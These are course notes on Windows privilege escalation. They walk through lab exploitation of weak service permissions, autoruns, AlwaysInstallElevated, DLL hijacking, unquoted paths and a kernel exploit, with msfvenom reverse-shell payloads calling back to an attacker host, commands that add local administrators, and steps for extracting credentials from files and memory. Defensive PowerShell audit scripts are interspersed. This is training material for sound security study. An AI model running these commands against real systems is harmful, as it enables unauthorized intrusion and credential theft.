Win Priv Esc - TCM Course

SYSTEM ENUM:

=====================

1. systeminfo # save the full output to a file and feed it to ./windows-exploit-suggester.py

2. systeminfo | findstr /b /c:"OS Name" /c:"OS Version" /c:"System Type"

3. wmic qfe

4. wmic qfe get Caption,Description,HotFixID,InstalledOn

5. wmic logicaldisk

6. wmic logicaldisk get caption,description,providername

7. wmic logicaldisk get caption

USER ENUM

===================

whoami

whoami /priv

whoami /groups

net user

net user <user>

net localgroup

net localgroup <group_name>

NETWORK ENUM:

======================

ipconfig

ipconfig /all # the DC may show up as the DNS server in this list

arp -a

route print

netstat -ano

PASSWORD HUNTING:

========================

findstr /si password *.txt *.ini *.config

AV and FW ENUM

==================

sc query windefend

sc queryex type= service # enumerate services

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

Sherlock - https://github.com/rasta-mouse/Sherlock

Watson - https://github.com/rasta-mouse/Watson

PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

JAWS - https://github.com/411Hall/JAWS

Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/

Seatbelt - https://github.com/GhostPack/Seatbelt

SharpUp - https://github.com/GhostPack/SharpUp

Meterpreter > run post/multi/recon/local_exploit_suggester

If pip is missing or broken:

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py

WINDOWS KERNEL EXPLOITS

==========================

Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits

port forwarding with plink.exe

Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

We first need to upload plink.exe to the target machine.

plink.exe -l root -pw <root_passwd> -R 445:127.0.0.1:445 <attacker_IP>

netstat -ano | grep 445

winexe -U Administrator%<password> //127.0.0.1 "cmd.exe"

What happens when I type getsystem? - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

cmdkey /list # search for stored credentials

mdb-sql <file>.mdb # opens .mdb files (Access database files)

readpst # tool to read .pst files (Microsoft Outlook mailbox files)

RUNAS command:

C:\Windows\System32\runas.exe /user:<domain>\<user> /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\<low_priv_user>\file.txt"

Registry Escalation - Autorun

Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe

2. In Autoruns, click on the 'Logon' tab.

3. From the listed results, notice that the "My Program" entry is pointing to "C:\Program Files\Autorun Program\program.exe".

4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

5. From the output, notice that the "Everyone" user group has "FILE_ALL_ACCESS" permission on the "program.exe" file.

Exploitation

Kali VM

1. Open command prompt and type: msfconsole

2. In Metasploit (msf > prompt) type: use multi/handler

3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

5. In Metasploit (msf > prompt) type: run

6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe

7. Copy the generated file, program.exe, to the Windows VM.

Windows VM

1. Place program.exe in 'C:\Program Files\Autorun Program'.

2. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

Kali VM

1. Wait for a new session to open in Metasploit.

2. In Metasploit (msf > prompt) type: sessions -i [Session ID]

3. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Registry Escalation - AlwaysInstallElevated

Detection

Windows VM

1. Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer

2. From the output, notice that the "AlwaysInstallElevated" value is 1.

3. In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer

4. From the output, notice that the "AlwaysInstallElevated" value is 1.
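Added example, not part of the course material: a PowerShell check for the two registry values above. The policy is only effective when the value is 1 in both HKLM and HKCU, so the function reports each hive and the combined state; the remediation part assumes it is run from an elevated prompt.

```powershell
# Added example (not course code): AlwaysInstallElevated must be 1 in BOTH hives
# for msiexec to install with SYSTEM rights, so check both and report the combined state.
function Test-AlwaysInstallElevated {
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        if ($null -eq $v) { 0 } else { [int]$v }    # missing key or value counts as disabled
    }
    [pscustomobject]@{
        HKLM       = $values[0]
        HKCU       = $values[1]
        Vulnerable = ($values[0] -eq 1 -and $values[1] -eq 1)
    }
}

$state = Test-AlwaysInstallElevated
$state

# Remediation (run elevated): set the value to 0 in both hives. In a domain, enforce
# "Always install with elevated privileges" = Disabled via GPO under both Computer and
# User Configuration > Administrative Templates > Windows Components > Windows Installer.
if ($state.Vulnerable) {
    foreach ($k in 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
                   'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer') {
        Set-ItemProperty -Path $k -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}
```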

Exploitation

Kali VM

1. Open command prompt and type: msfconsole

2. In Metasploit (msf > prompt) type: use multi/handler

3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

5. In Metasploit (msf > prompt) type: run

6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi

7. Copy the generated file, setup.msi, to the Windows VM.

Windows VM

1. Place 'setup.msi' in 'C:\Temp'.

2. Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi

Enjoy your shell! :)

Service Escalation - Registry

Detection

Windows VM

1. Open powershell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

2. Notice that the output shows that users belonging to "NT AUTHORITY\INTERACTIVE" have "FullControl" permission over the registry key.

Exploitation

Windows VM

1. Copy 'C:\Users\User\Desktop\Tools\Source\windows_service.c' to the Kali VM.

Kali VM

1. Open windows_service.c in a text editor and replace the command used by the system() function with: cmd.exe /k net localgroup administrators user /add

2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use 'sudo apt install gcc-mingw-w64')

3. Copy the generated file x.exe, to the Windows VM.

Windows VM

1. Place x.exe in 'C:\Temp'.

2. Open command prompt and type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

3. In the command prompt type: sc start regsvc

4. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
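Added example, not part of the course material: the Get-Acl check above generalised to every key under HKLM\SYSTEM\CurrentControlSet\Services. It flags Allow ACEs that give Everyone, Authenticated Users, BUILTIN\Users or INTERACTIVE a right that permits rewriting ImagePath; the function name is my own, and it assumes an elevated PowerShell on the host being audited.

```powershell
# Added example (not course code): walk every service registry key and report ACEs
# that let low-privilege principals change values such as ImagePath.
$LowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'   # Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE
$WriteRights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, ChangePermissions, TakeOwnership, FullControl'

function Find-WritableServiceKey {
    foreach ($key in Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue) {
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
            # Inherit-only generic rights appear as raw numbers (e.g. 268435456) and are not matched here.
            if ($LowPrivSids -contains $sid -and (($ace.RegistryRights -band $WriteRights) -ne 0)) {
                [pscustomobject]@{
                    Service   = $key.PSChildName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                    ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
                }
            }
        }
    }
}

Find-WritableServiceKey | Format-Table -AutoSize
```

On the course VM the output should include regsvc with NT AUTHORITY\INTERACTIVE holding FullControl; on a hardened host the list should be empty.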

Service Escalation - Executable Files

Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"

2. Notice that the "Everyone" user group has "FILE_ALL_ACCESS" permission on the filepermservice.exe file.

Exploitation

Windows VM

1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

2. In command prompt type: sc start filepermsvc

3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Privilege Escalation - Startup Applications

Detection

Windows VM

1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

2. From the output notice that the "BUILTIN\Users" group has full access '(F)' to the directory.

Exploitation

Kali VM

1. Open command prompt and type: msfconsole

2. In Metasploit (msf > prompt) type: use multi/handler

3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

5. In Metasploit (msf > prompt) type: run

6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe

7. Copy the generated file, x.exe, to the Windows VM.

Windows VM

1. Place x.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".

2. Logoff.

3. Login with the administrator account credentials.

Kali VM

1. Wait for a session to be created; it may take a few seconds.

2. In Meterpreter(meterpreter > prompt) type: getuid

3. From the output, notice the user is "User-PC\Admin".

icacls Documentation - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

Service Escalation - DLL Hijacking

Detection

Windows VM

1. Open the Tools folder that is located on the desktop and then go to the Process Monitor folder.

2. In reality, executables would be copied from the victim's host over to the attacker's host for analysis during run time. Alternatively, the same software can be installed on the attacker's host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select 'Run as administrator' from the menu.

3. In procmon, select "filter". From the left-most drop down menu, select 'Process Name'.

4. In the input box on the same line type: dllhijackservice.exe

5. Make sure the line reads "Process Name is dllhijackservice.exe then Include" and click on the 'Add' button, then 'Apply' and lastly on 'OK'.

6. Next, select from the left-most drop down menu 'Result'.

7. In the input box on the same line type: NAME NOT FOUND

8. Make sure the line reads "Result is NAME NOT FOUND then Include" and click on the 'Add' button, then 'Apply' and lastly on 'OK'.

9. Open command prompt and type: sc start dllsvc

10. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to load 'C:\Temp\hijackme.dll' but could not, as the file was not found. Note that 'C:\Temp' is a writable location.

Exploitation

Windows VM

1. Copy 'C:\Users\User\Desktop\Tools\Source\windows_dll.c' to the Kali VM.

Kali VM

1. Open windows_dll.c in a text editor and replace the command used by the system() function with: cmd.exe /k net localgroup administrators user /add

2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

3. Copy the generated file hijackme.dll, to the Windows VM.

Windows VM

1. Place hijackme.dll in 'C:\Temp'.

2. Open command prompt and type: sc stop dllsvc & sc start dllsvc

3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Service Escalation - binPath

Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

2. Notice that the output suggests that the user "User-PC\User" has the "SERVICE_CHANGE_CONFIG" permission.

Exploitation

Windows VM

1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"

2. In command prompt type: sc start daclsvc

3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
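Added example, not part of the course material: a PowerShell equivalent of the accesschk -wuvc check above, run across all services. It reads each service's SDDL from sc.exe sdshow, parses it with the .NET RawSecurityDescriptor class, and flags Allow ACEs that give low-privilege principals SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or a generic right that implies them; the function name and the constant names are my own.

```powershell
# Added example (not course code): parse each service's DACL (from sc.exe sdshow)
# and flag Allow ACEs that give low-privilege principals reconfiguration rights.
$LowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'   # Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE
$SERVICE_CHANGE_CONFIG = 0x0002      # lets the holder change binPath, start type and service account
$WRITE_DAC   = 0x40000;     $WRITE_OWNER   = 0x80000
$GENERIC_ALL = 0x10000000;  $GENERIC_WRITE = 0x40000000   # generic rights map onto CHANGE_CONFIG as well
$DangerMask  = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

function Find-WeakServiceDacl {
    foreach ($svc in Get-Service) {
        # sc.exe prints the SDDL on a line beginning with "D:"; access errors print "[SC] ..." instead
        $sddl = sc.exe sdshow $svc.Name | Where-Object { $_ -match '^D:' } | Select-Object -First 1
        if (-not $sddl) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne 'AccessAllowed') { continue }
            if ($LowPrivSids -contains $ace.SecurityIdentifier.Value -and (($ace.AccessMask -band $DangerMask) -ne 0)) {
                [pscustomobject]@{
                    Service      = $svc.Name
                    Principal    = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value
                    AccessMask   = ('0x{0:X}' -f $ace.AccessMask)
                    ChangeConfig = (($ace.AccessMask -band ($SERVICE_CHANGE_CONFIG -bor $GENERIC_ALL -bor $GENERIC_WRITE)) -ne 0)
                }
            }
        }
    }
}

Find-WeakServiceDacl | Format-Table -AutoSize
```

The fix for a hit is to reset the service DACL with sc.exe sdset (or the vendor's installer) so that only administrators and SYSTEM hold CHANGE_CONFIG.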

Service Escalation - Unquoted Service Paths

Detection

Windows VM

1. Open command prompt and type: sc qc unquotedsvc

2. Notice that the "BINARY_PATH_NAME" field displays a path that is not enclosed in quotes.

Exploitation

Kali VM

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

2. Copy the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in 'C:\Program Files\Unquoted Path Service'.

2. Open command prompt and type: sc start unquotedsvc

3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
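Added example, not part of the course material: one PowerShell audit that covers the three file-permission checks from the Autorun, Service Executable Files and Unquoted Service Paths sections in a single pass. It assumes an elevated PowerShell on the host being audited; the helper names are my own, and the .exe-based path parsing is a generalisation of the single cases the course shows.

```powershell
# Added example (not course code): audit Run-key autoruns and service binaries for
# executables low-privilege principals can overwrite, plus unquoted service paths.
$LowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545'   # Everyone, Authenticated Users, BUILTIN\Users
$WriteMask   = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'

# True when an Allow ACE gives one of the low-privilege SIDs a write-type right on the file.
function Test-LowPrivWritable([string]$Path) {
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($LowPrivSids -contains $sid -and (($ace.FileSystemRights -band $WriteMask) -ne 0)) { return $true }
    }
    return $false
}

# Executable part of a command line: the quoted token, or everything up to the first ".exe" if unquoted.
function Get-ExePath([string]$Cmd) {
    $Cmd = $Cmd.Trim()
    if ($Cmd -match '^"([^"]+)"') { return $Matches[1] }
    if ($Cmd -match '^(.*?\.exe)') { return $Matches[1] }
    return ($Cmd -split '\s+')[0]
}

# 1. HKLM Run/RunOnce autoruns (64-bit and 32-bit views)
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
        $exe = [Environment]::ExpandEnvironmentVariables((Get-ExePath ([string]$p.Value)))
        if (Test-LowPrivWritable $exe) {
            [pscustomobject]@{ Kind = 'Autorun'; Name = $p.Name; Path = $exe; Issue = 'Binary writable by low-priv users' }
        }
    }
}

# 2. Services: unquoted paths containing spaces, and binaries writable by low-privilege users
foreach ($svc in (Get-CimInstance Win32_Service | Where-Object { $_.PathName })) {
    $path = $svc.PathName.Trim()
    $exe  = [Environment]::ExpandEnvironmentVariables((Get-ExePath $path))
    if (-not $path.StartsWith('"') -and $exe -match '\s') {
        [pscustomobject]@{ Kind = 'Service'; Name = $svc.Name; Path = $path; Issue = 'Unquoted path with spaces' }
    }
    if (Test-LowPrivWritable $exe) {
        [pscustomobject]@{ Kind = 'Service'; Name = $svc.Name; Path = $exe; Issue = 'Binary writable by low-priv users' }
    }
}
```

On the course VM this should report the Autorun "My Program" entry, filepermservice.exe and unquotedsvc; the remediation in each case is to quote the path with sc config binpath= and to remove write rights for Everyone and Users with icacls.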

For additional practice, it is recommended to attempt the TryHackMe room Steel Mountain (https://tryhackme.com/room/steelmountain).

Potato Escalation - Hot Potato

Exploitation

Windows VM

1. In command prompt type: powershell.exe -nop -ep bypass

2. In the PowerShell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

3. In the PowerShell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

4. To confirm that the attack was successful, in the PowerShell prompt type: net localgroup administrators

Password Mining Escalation - Configuration Files

Exploitation

Windows VM

1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml

2. Scroll down to the "<Password>" property and copy the base64 string that is enclosed between the "<Value>" tags underneath it.

Kali VM

1. In a terminal, type: echo [copied base64] | base64 -d

2. Notice the cleartext password

Password Mining Escalation - Memory

Exploitation

Kali VM

1. Open command prompt and type: msfconsole

2. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic

3. In Metasploit (msf > prompt) type: set uripath x

4. In Metasploit (msf > prompt) type: run

Windows VM

1. Open Internet Explorer and browse to: http://[Kali VM IP Address]/x

2. Open command prompt and type: taskmgr

3. In Windows Task Manager, right-click on "iexplore.exe" in the "Image Name" column and select "Create Dump File" from the popup menu.

4. Copy the generated file, iexplore.DMP, to the Kali VM.

Kali VM

1. Place 'iexplore.DMP' on the desktop.

2. Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

3. Select and copy the Base64 encoded string.

4. In command prompt type: echo -ne [Base64 String] | base64 -d

5. Notice the credentials in the output.

Privilege Escalation - Kernel Exploits

Establish a shell

Kali VM

1. Open command prompt and type: msfconsole

2. In Metasploit (msf > prompt) type: use multi/handler

3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

5. In Metasploit (msf > prompt) type: run

6. Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe

7. Copy the generated file, shell.exe, to the Windows VM.

Windows VM

1. Execute shell.exe and obtain a reverse shell.

Detection & Exploitation

Kali VM

1. In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester

2. Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation

3. In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif

4. In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]

5. In Metasploit (msf > prompt) type: set LPORT 5555

6. In Metasploit (msf > prompt) type: run

NOTE: The shell might default to your eth0 during this attack. If so, ensure you type set lhost [Kali VM IP Address] and run again.
